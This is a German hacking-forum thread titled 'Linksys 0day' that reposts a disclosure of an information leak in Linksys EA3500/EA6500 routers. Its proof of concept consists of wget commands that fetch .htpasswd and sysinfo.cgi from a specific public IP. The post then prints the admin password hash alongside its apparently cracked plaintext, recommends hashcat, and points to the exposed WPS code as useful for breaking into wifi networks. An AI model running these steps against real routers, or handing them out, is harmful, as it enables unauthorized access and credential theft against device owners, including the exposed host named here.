Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Linksys 0day

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
sniffer

sniffer

    Lamer

  • Premium Member
  • Likes
    5
  • 17 Beiträge
  • 20 Bedankt
  • verifiziert
  • Android [root]
  • Linux
Linksys Smart Wi-Fi Router EA3500 / EA6500 Vulnerabilities Reply with quote

Product: Linksys Smart Wi-Fi Router EA6500

Firmware: Version 1.1.29 (Build 162351)



Product: Linksys Smart Wi-Fi Router EA3500

Firmware: Version 1.1.39.145204



Vulnerability type: Router password and system private information disclosure!

Severity: High (Critical)



Details: The vulnerability allows an attacker to read system private information, and get MD5(unix) encrypted administrator password, remotely.



Exploitation-Technique (POC):

Target: [url]http://72.8.255.7/ui/dynamic/login.html[/url]



#Password disclosure

$ wget [url]http://72.8.255.7/.htpasswd[/url] > password

$ cat password

admin:$1$HrEMQi7U$/Ci6nHHLzVfMcwCk2mc23/ ( decrypted password: stefani1)



#using brute force tools like hash cat, its possible to decrypt the password



#System disclosure

$ wget [url]http://72.8.255.7/sysinfo.cgi[/url] > system_information

$ cat system_information



Code:

Vendor: LINKSYS

ModelName: EA3500



Firmware Version: 1.1.39.145204



Firmware Builddate: 2012-11-14 10:57

Product.type: production

Linux: Linux version 2.6.35.8 (root@hudson-node) (gcc version 4.2.0 20070413 (prerelease) (CodeSourcery Sourcery G++ Lite 2007q1-21)) #1 Wed Nov 14 02:31:16 PST 2012



Board: audi





-----U-Boot Data-----

fw_printenv bootdelay: bootdelay=0



fw_printenv mtdparts: mtdparts=mtdparts=nand_mtd:512k(uboot)ro,16k@512k(u_env),16k@528k(s_env),20m@2m(

kernel),20m@2m(rootfs)fs,20m@22m(alt_kernel),20m@22m(alt_rootfs)fs,22m@42m(syscf

g)



fw_printenv bootcmd: bootcmd=run nandboot



fw_printenv boot_part: boot_part=1....





it shares more information about the system, even it shares wps code, which can be used for wifi hacking.




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 24 user(s)


    , Bad Grandpa, badbuddha, bumg2, Ch!ller, ch00sen, cooky1, corkscrew, Framerater, Hedrek, lion., lolorollo, Mantrayana, Minimax, most_uniQue, paulaner, pdr0, Platin, Sayco, smc2014, sniffer, Xenio, zepsus, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.